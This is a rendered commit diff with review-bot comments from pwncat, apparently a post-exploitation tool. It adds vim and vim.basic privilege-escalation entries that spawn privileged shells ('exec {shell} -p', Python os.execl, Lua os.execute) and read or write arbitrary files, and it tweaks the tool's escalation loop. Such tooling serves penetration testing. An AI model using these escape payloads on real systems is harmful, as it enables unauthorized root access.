Got vim seemingly working as a GTFObin...
This commit is contained in:
parent
3801b50f14
commit
2eb9487e64
@ -879,19 +879,19 @@
|
|||||||
{
|
{
|
||||||
"type": "shell",
|
"type": "shell",
|
||||||
"payload": "{command}",
|
"payload": "{command}",
|
||||||
"args": ["-c", "':!{shell}'", "-c", "'quit'"],
|
"args": ["-c", "':!exec {shell} -p'", "-c", "':q'"],
|
||||||
// Include an extra newline to be sure to exit vim itself.
|
// Include an extra newline to be sure to exit vim itself.
|
||||||
"exit": "exit\n\n"
|
"exit": "exit\n\n"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "shell",
|
"type": "shell",
|
||||||
"payload": "{command}",
|
"payload": "{command}",
|
||||||
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
|
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "shell",
|
"type": "shell",
|
||||||
"payload": "{command}",
|
"payload": "{command}",
|
||||||
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
|
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "shell",
|
"type": "shell",
|
||||||
@ -907,10 +907,47 @@
|
|||||||
{
|
{
|
||||||
"type": "write",
|
"type": "write",
|
||||||
"stream": "print",
|
"stream": "print",
|
||||||
"payload": "{command} >/dev/null",
|
"payload": "{cat} - | {command}",
|
||||||
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"]
|
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"],
|
||||||
|
"exit": "{ctrl_d}"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"vim.basic": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-c", "':!exec {shell} -p'", "-c", "':q'"],
|
||||||
|
// Include an extra newline to be sure to exit vim itself.
|
||||||
|
"exit": "exit\n\n"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-c", "':lua os.execute(\"reset; exec {shell}\")'", "-c", "'quit'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-es" ,"'+%print'" ,"'+:q!'", "{lfile}"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "write",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{cat} - | {command}",
|
||||||
|
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"],
|
||||||
|
"exit": "{ctrl_d}"
|
||||||
}
|
}
|
||||||
// Vim can PROBABLY file write... but I have not figured that out just yet.
|
|
||||||
],
|
],
|
||||||
//-------------------------------------------------------------------
|
//-------------------------------------------------------------------
|
||||||
"wish": [
|
"wish": [
|
||||||
|
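Review bot: The new `"vim.basic": [` array repeats the "vim" entries above it almost verbatim, and the two already drift: the first "vim" entry now exits with `':q'` while its py/py3 siblings still use `'quit'`, and the `:lua` variant appears only under "vim.basic" as far as this hunk shows. Every future fix to one list will have to be hand-mirrored to the other, which is how such tables rot. If the file format cannot reference one list from another, a comment above the new key would at least make the coupling explicit, e.g. `// Keep in sync with the "vim" entries above; vim.basic is presumably the same binary under its alternatives name.`. The "vim" array's last shell entry before the second hunk is cut by the hunk boundary, so I cannot confirm whether "vim" also carries the lua entry.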
@ -9,10 +9,6 @@ from sqlalchemy.exc import InvalidRequestError
|
|||||||
import warnings
|
import warnings
|
||||||
from sqlalchemy import exc as sa_exc
|
from sqlalchemy import exc as sa_exc
|
||||||
|
|
||||||
# Ignore SQL Alchemy warnings
|
|
||||||
with warnings.catch_warnings():
|
|
||||||
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
|
|
||||||
|
|
||||||
import pwncat
|
import pwncat
|
||||||
from pwncat import util
|
from pwncat import util
|
||||||
from pwncat.remote import Victim
|
from pwncat.remote import Victim
|
||||||
@ -80,5 +76,11 @@ def main():
|
|||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
|
|
||||||
|
# Ignore SQL Alchemy warnings
|
||||||
|
with warnings.catch_warnings():
|
||||||
|
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
|
||||||
|
|
||||||
main()
|
main()
|
||||||
|
|
||||||
sys.exit(0)
|
sys.exit(0)
|
||||||
|
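Review bot: The comment moved into the `__main__` guard still reads `# Ignore SQL Alchemy warnings` and does not say why the block now wraps `main()`; the previous module-level `with warnings.catch_warnings():` exited immediately after `simplefilter`, restoring the filters before anything ran, so the suppression was a no-op. I would make that explicit so nobody hoists it back to module level, e.g. `# Suppress SQLAlchemy SAWarnings for the lifetime of main(): catch_warnings() restores the previous filters on exit, so the filter must wrap the call rather than sit at module level.`. Whether the trailing `sys.exit(0)` sits inside or outside the with block is not recoverable from the rendered page; either placement is fine here.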
@ -238,7 +238,7 @@ class CommandParser:
|
|||||||
# We have a connection! Go back to raw mode
|
# We have a connection! Go back to raw mode
|
||||||
pwncat.victim.state = State.RAW
|
pwncat.victim.state = State.RAW
|
||||||
self.running = False
|
self.running = False
|
||||||
except Exception as exc:
|
except (Exception, KeyboardInterrupt) as exc:
|
||||||
traceback.print_exc()
|
traceback.print_exc()
|
||||||
continue
|
continue
|
||||||
|
|
||||||
@ -299,7 +299,7 @@ class CommandParser:
|
|||||||
command.parser.prog = prog_name
|
command.parser.prog = prog_name
|
||||||
|
|
||||||
except SystemExit:
|
except SystemExit:
|
||||||
# The arguments were icncorrect
|
# The arguments were incorrect
|
||||||
return
|
return
|
||||||
|
|
||||||
|
|
||||||
|
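Review bot: Adding `KeyboardInterrupt` to `except (Exception, KeyboardInterrupt) as exc:` means Ctrl-C inside this loop now prints a full traceback via `traceback.print_exc()` and then `continue`s, so the interrupt can no longer leave the loop and the user sees a stack dump for a deliberate key press. If the intent is to keep the prompt alive on Ctrl-C, give it its own clause ahead of the generic one, `except KeyboardInterrupt:` / `continue`, and keep `except Exception:` with the traceback for real errors. `exc` is not read in the visible lines, so the `as exc` can go unless the omitted part of the handler uses it. The enclosing `try` starts outside the hunk.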
@ -265,7 +265,7 @@ class MethodWrapper:
|
|||||||
return self.method.build_payload(self.binary_path, **kwargs)
|
return self.method.build_payload(self.binary_path, **kwargs)
|
||||||
|
|
||||||
def exit(self, **kwargs) -> str:
|
def exit(self, **kwargs) -> str:
|
||||||
return self.method.binary.gtfo.resolve_binaries(
|
original = self.method.binary.gtfo.resolve_binaries(
|
||||||
self.method.exit,
|
self.method.exit,
|
||||||
ctrl_c=ControlCodes.CTRL_C,
|
ctrl_c=ControlCodes.CTRL_C,
|
||||||
ctrl_z=ControlCodes.CTRL_Z,
|
ctrl_z=ControlCodes.CTRL_Z,
|
||||||
@ -275,6 +275,11 @@ class MethodWrapper:
|
|||||||
**kwargs,
|
**kwargs,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
if original == "" and Capability.SHELL in self.cap:
|
||||||
|
original = "exit\n"
|
||||||
|
|
||||||
|
return original
|
||||||
|
|
||||||
def input(self, **kwargs) -> str:
|
def input(self, **kwargs) -> str:
|
||||||
return self.method.binary.gtfo.resolve_binaries(
|
return self.method.binary.gtfo.resolve_binaries(
|
||||||
self.method.input,
|
self.method.input,
|
||||||
|
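Review bot: `exit()` now references `Capability` and `self.cap`, but no import hunk for this file is shown; if `Capability` is not already imported in this module the `NameError` surfaces only at call time, and only when `resolve_binaries` returns an empty string for a shell technique. The new default also deserves a docstring, since callers now receive `"exit\n"` for a shell method whose entry has no exit string: `"""Return the script that leaves this method's shell; shell-capable methods with no explicit exit string fall back to "exit\\n"."""`. The `if original == "" and Capability.SHELL in self.cap:` test assumes `resolve_binaries` returns a `str` and never `None`, which is worth confirming against its implementation. The middle of the `resolve_binaries(...)` argument list lies between the two hunks and is not shown.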
@ -277,12 +277,14 @@ class Finder:
|
|||||||
for technique in techniques:
|
for technique in techniques:
|
||||||
if Capability.SHELL in technique.capabilities:
|
if Capability.SHELL in technique.capabilities:
|
||||||
try:
|
try:
|
||||||
|
|
||||||
# Attempt our basic, known technique
|
# Attempt our basic, known technique
|
||||||
|
shlvl = pwncat.victim.getenv("SHLVL")
|
||||||
exit_script = technique.method.execute(technique)
|
exit_script = technique.method.execute(technique)
|
||||||
pwncat.victim.flush_output(some=True)
|
pwncat.victim.flush_output(some=True)
|
||||||
|
|
||||||
# Reset the terminal to ensure we are stable
|
# Reset the terminal to ensure we are stable
|
||||||
time.sleep(0.1)
|
time.sleep(0.1) # This seems inevitable for some privescs...
|
||||||
pwncat.victim.reset()
|
pwncat.victim.reset()
|
||||||
|
|
||||||
# Check that we actually succeeded
|
# Check that we actually succeeded
|
||||||
@ -300,7 +302,9 @@ class Finder:
|
|||||||
|
|
||||||
# Get out of this subshell. We don't need it
|
# Get out of this subshell. We don't need it
|
||||||
# pwncat.victim.process(exit_script, delim=False)
|
# pwncat.victim.process(exit_script, delim=False)
|
||||||
|
|
||||||
pwncat.victim.run(exit_script, wait=False)
|
pwncat.victim.run(exit_script, wait=False)
|
||||||
|
time.sleep(0.1) # Still inevitable for some privescs...
|
||||||
pwncat.victim.recvuntil("\n")
|
pwncat.victim.recvuntil("\n")
|
||||||
|
|
||||||
# Clean up whatever mess was left over
|
# Clean up whatever mess was left over
|
||||||
@ -312,6 +316,8 @@ class Finder:
|
|||||||
# Continue on as if it hadn't worked.
|
# Continue on as if it hadn't worked.
|
||||||
except PrivescError:
|
except PrivescError:
|
||||||
pass
|
pass
|
||||||
|
except ValueError:
|
||||||
|
raise PrivescError
|
||||||
if Capability.READ in technique.capabilities:
|
if Capability.READ in technique.capabilities:
|
||||||
readers.append(technique)
|
readers.append(technique)
|
||||||
if Capability.WRITE in technique.capabilities:
|
if Capability.WRITE in technique.capabilities:
|
||||||
|
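Review bot: The new `except ValueError:` / `raise PrivescError` clause at the bottom of the loop body changes control flow in a way the sibling `except PrivescError: pass` does not: a `ValueError` raised anywhere in the `try` aborts the whole `for technique in techniques:` loop instead of skipping that technique, and the `ValueError` survives only as implicit context. If aborting is intended, keep the cause explicit with `except ValueError as err:` / `raise PrivescError from err`; if it is not, `pass` or `continue` would match the clause above it. The `shlvl = pwncat.victim.getenv("SHLVL")` added in the first hunk is not read anywhere in the visible lines; presumably it is used in new-side lines 291–301 between the hunks, otherwise it is dead. The two `time.sleep(0.1)` calls with "inevitable" comments would read better as one named constant such as `PRIVESC_SETTLE_DELAY = 0.1` with the reason stated once.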